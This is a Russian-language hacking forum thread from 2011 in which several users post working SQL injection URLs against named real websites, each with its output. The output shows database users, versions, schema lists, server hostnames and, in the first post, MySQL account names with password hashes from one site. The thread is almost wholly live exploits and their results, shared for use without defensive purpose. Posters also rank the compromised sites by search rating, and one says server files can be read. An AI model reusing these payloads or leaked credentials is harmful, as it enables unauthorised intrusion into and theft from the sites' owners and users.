HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.07.2011, 03:57
August12
Новичок
Регистрация: 11.11.2007
Сообщений: 3
Провел на форуме:
12813

Репутация: 22
По умолчанию

Target: http://www.bowenshideout.com/items.php?id=87

Host IP: 65.61.119.130

Web Server: Apache/2.0.58 (Unix) PHP/4.4.6 mod_ssl/2.0.58 OpenSSL/0.9.7i

Powered-by: PHP/4.4.6

DB Server: MySQL >=5

Resp. Time(avg): 931 ms

Current User: ann@localhost

Sql Version: 5.0.15

Current DB: nichebox

System User: ann@localhost

DB User: 'ann'@'localhost'

Data Bases: information_schema

amiecleans

busbywc

divinelightmassage

flsrv

foxyhorseandhound

hallowedpoints

mobfamilygaming

nichebox

nichebox1

nichebox2

nichebox3

nichebox4

skipcook

spokanesporthorse

theamericanschoolforequestrianart

thelotteryclub

upc

zodle_calendar

zodle_classifieds

zodle_directory

==========================================

Blind

Target: http://www.depalo.com/view_item.php?id=2257

Host IP: 64.226.181.99

Web Server: Apache

DB Server: MySQL >=5

Resp. Time(avg): 1227 ms

Current User: depaloUser@localhost

Sql Version: 5.0.77-log

Current DB: depalo

System User: depaloUser@localhost

Host Name: ipdmmg0021atl2.pubip.peer1.net

Installation dir: /usr/

DB User: 'depaloUser'@'%'

Data Bases: information_schema

depalo

==================================================

Target: http://enbarsenal.com/item/view_item.php?id=2257

Host IP: 69.163.133.73

Web Server: Apache

DB Server: MySQL >=5

Resp. Time(avg): 899 ms

Current User: net7user@apache2-prance.gravano.dreamhost.com

Sql Version: 5.1.53-log

Current DB: net7

System User: net7user@apache2-prance.gravano.dreamhost.com

Host Name: fwap

Installation dir: /data/mysql/deakyne/

DB User: 'net7user'@'67.205.0.0/255.255.192.0'

Data Bases: information_schema

net7==============================================

Target: http://www.yourprops.com/view_item.php?movie_prop=10270

Host IP: 74.208.106.166

Web Server: Apache/2.2.6 (Fedora)

Powered-by: PHP/5.1.6

DB Server: MySQL >=5

Resp. Time(avg): 909 ms

Current User: admin@localhost

Sql Version: 5.0.27

Current DB: yourprops

System User: admin@localhost

Installation dir: /usr/

DB User & Pass: admin:5fb503f751512093:localhost

pma_IiabUsiU1n6q:6c4572a01bdfb70d:localhost

horde:039b58f6547b38c2:localhost

pma_g5Dqcuu61ikC:60fb772f4a1fa923:localhost

pma_AVMLiZ09j6Cb:05e06de46f9baae2:localhost

yourprops:6632bfb46db6d97e:%

Data Bases: information_schema

horde

mysql

phpmyadmin_AVMLiZ09j6Cb

phpmyadmin_IiabUsiU1n6q

phpmyadmin_g5Dqcuu61ikC

psa

yourprops

НЕ надо плодить посты, забивай все в один пост, если после тебя ни кто не постил cообщения
 
Ответить с цитированием

  #2  
Старый 26.07.2011, 00:50
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

пр1

Цитата:
Сообщение от None  
http://www.stepportal.ru/view_item.php?id=-7'+UnIon+selECt+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,u ser(),version(),database()),11,12,13+--+
gb_z_stepp17f@10.0.2.19:5.1.46-log:gb_z_stepp17f

тиц 10 пр2

Цитата:
Сообщение от None  
http://www.club-parlament.de/ajg/view_item.php?id=28052000000000000+union+select+co ncat_ws(0x3a,user(),version(),database())+--+
drupal@localhost:5.1.49-3:d_parlament

пр1

Цитата:
Сообщение от None  
http://www.lighter.ru/view_item.php?id=1156+UnIon+selECt+1,2,3,concat_ws (0x3a,user(),version(),database()),5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20+--+
lighter@zvm13.host.ru:4.0.27-log:lighter

тиц 10

Цитата:
Сообщение от None  
http://tiger.in.ua/view_item.php?id=-541+union+select+1,2,3,4,5,6,concat_ws(0x3a,user() ,version(),database()),8,9,0,11,12,13,14,15+--+
mandrey_tiger@localhost:4.0.27-standard-log:mandrey_tiger

Цитата:
Сообщение от None  
http://mandrey.uran.biz.ua/view_item.php?id=-100+union+select+1,2,3,4,5,6,concat_ws(0x3a,user() ,version(),database()),8,9,0,11,12,13,14,15+--+
mandrey_profi@localhost:4.0.27-standard-log:mandrey_profi
 
Ответить с цитированием

  #3  
Старый 26.07.2011, 14:28
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Ахтунг )

http://www.spaceweather.com/flybys/sat_popup.php?sat_name=-Idefix%20and%20Ariane%2042B%27+union+select+1,2,3, 4,version%28%29,6,7,8--+
 
Ответить с цитированием

  #4  
Старый 26.07.2011, 18:08
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от None  
http://opulent-style.com/view_item.php?id=473+OR+(SELECT+COUNT(*)+FROM+(SEL ECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CON CAT(MID((select+concat_ws(0x3a,user(),version(),da tabase()),1,63),+FLOOR(RAND(0)*2)))--+
artem@68.178.254.169:4.1.24-max-log:artem

Цитата:
Сообщение от None  
http://elgaucho.ru/newsite/ru/culture.php?id=80000000000000+union+select+1,conca t_ws(0x3a,user(),version(),database()),3,4,5,6,7,8 +--+
elgaucho_mysql@10.1.137.54:5.1.41-log:elgaucho_elgaucho

Цитата:
Сообщение от None  
http://www.koreatravel.ru/culture/index.php?id=-95'+union+select+1,2,concat_ws(0x3a,user(),version (),database())+--+
koreatrave@localhost:5.0.26-log:koreatrave

Цитата:
Сообщение от None  
http://www.maglogos.ru/catalog.php?r=-10+union+select+1,concat_ws%280x3a,user%28%29,vers ion%28%29,database%28%29%29,3+--+
veretenina_bs@localhost:5.0.77-log:veretenina_bs

Цитата:
Сообщение от None  
http://www.kabelcom.ru/content.php?id=16+union+select+1,concat_ws%280x3a, user%28%29,version%28%29,database%28%29%29+--+
kabelcomru@localhost:5.1.50-lk-log:kabelcomru
 
Ответить с цитированием

  #5  
Старый 26.07.2011, 22:10
COOLBOY007
Новичок
Регистрация: 09.06.2009
Сообщений: 9
Провел на форуме:
72074

Репутация: 0
Отправить сообщение для COOLBOY007 с помощью ICQ
По умолчанию

Код:
Code:
http://www.hkyongnuo.com/e-detail.php?ID=-281+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+--+
web2u16@127.0.0.1:5.1.56:web2db16

PR 3

тИЦ 20
 
Ответить с цитированием

  #6  
Старый 27.07.2011, 13:01
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от None  
http://www.sirius55.ru/order.php?id=-737'+union+select+1,concat_ws(0x3a,user(),version( ),database()),3,4,5,6,7,8,9,0+--+
sirius55ru@localhost:5.0.56-lk-log:sirius55ru

Цитата:
Сообщение от None  
http://dushevaya.ru/order.php?id=-490'+UnIon+selECt+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7+--+
dushevaya@localhost:5.1.49-3:dushevaya

Цитата:
Сообщение от None  
http://www.slidell.la.us/cal-view.php?ID=-712+UnIon+selECt+1,concat_ws(0x3a,user(),version() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46+--+
slidell@localhost:4.1.22-log:cityofslidell

Решил малость прикалоться))

Цитата:
Сообщение от None  
http://www.stearnslending.com/about-us/news-item.php?id=-26+union+select+1,2,unhex(hex(concat_ws(0x3a,user( ),version(),database()))),(select(@x)from(select(@ x:=0x00),(select(0)from(information_schema.columns )where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,tab le_schema,0x2e,table_name,0x3a,column_name))))x),5 +--+
ROOT@FTP.CUPARTNERS.COM:5.0.18-NT:STEARNS_LENDING_V11081

Цитата:
Сообщение от None  
http://contactusconsulting.com/en/Page_ID.php?IDTXT=-57'+union+select+(select(@x)from(select(@x:=0x00), (select(0)from(information_schema.columns)where(ta ble_schema!=0x696e666f726d6174696f6e5f736368656d61 )and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema ,0x2e,table_name,0x3a,column_name,0x20202020207c,u ser(),0x3a,version(),0x3a,database()))))x)+--+
consulting09@L40170.solusoftware.com:5.0.77:consul ting_dbo
 
Ответить с цитированием

  #7  
Старый 27.07.2011, 14:50
COOLBOY007
Новичок
Регистрация: 09.06.2009
Сообщений: 9
Провел на форуме:
72074

Репутация: 0
Отправить сообщение для COOLBOY007 с помощью ICQ
По умолчанию

Код:
Code:
http://lingedelit.ru/category.php?id=-8+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9+--+
lingedelit_ru@vps1996.vps.host.ru:5.0.90:lingedeli t_ru

PR 1

тИЦ 10

Код:
Code:
http://www.zareformu.ru/index.php?id=-5303+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5+--+
borodin-mokaru@localhost:5.0.51a-24+lenny4:law

PR 2
 
Ответить с цитированием

  #8  
Старый 27.07.2011, 15:17
*uNkN0Wn*
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459

Репутация: 116
Отправить сообщение для *uNkN0Wn* с помощью ICQ
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.romefortravellers.com/content.php?sez=-eventi'+union+select+1,2,3,user(),5,6+--+[/COLOR][/COLOR] 
 
Ответить с цитированием

  #9  
Старый 27.07.2011, 20:43
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию

Код:
Code:
http://vl2.gallaudet.edu/staff.php?id=-40+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13+--+
5.0.51a-community-nt

PR 6

P.S. Файлы читаются...
 
Ответить с цитированием

  #10  
Старый 27.07.2011, 21:31
COOLBOY007
Новичок
Регистрация: 09.06.2009
Сообщений: 9
Провел на форуме:
72074

Репутация: 0
Отправить сообщение для COOLBOY007 с помощью ICQ
По умолчанию

Код:
Code:
http://www.proauto.ws/view.php?id=-1436+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6+--+
pux161_proauto@localhost:5.0.91-community:pux161_proauto

PR 2

тИЦ 10

Код:
Code:
http://www.microkino.ru/view.php?id=-214+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5+--+
microkino@localhost:5.0.70:microkino

PR 2

тИЦ 20

Код:
Code:
http://www.lestnicy.net/category.php?id=-84+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8+--+
lestnic4_borik@localhost:4.1.25-log:lestnic4_shop

PR 2

тИЦ 20

Код:
Code:
http://privatehotel.net.ua/order.php?ad=-305+union+select+concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7+--+
sotrudnik_vert@localhost:5.1.40-log:sotrudnik_photel

Код:
Code:
http://avtounion.ru/news/article.php?id=-1040+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8+--+
u109358@78.108.84.141:5.0.90:b109358

PR 2

тИЦ 50

Код:
Code:
http://www.intforus.ru/vuz-info.php?id=-15+union+select+concat_ws(0x3a,user(),version(),database())+--+
portal@localhost:5.0.32-Debian_7etch12-log:cmiir

PR 1

тИЦ 20
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ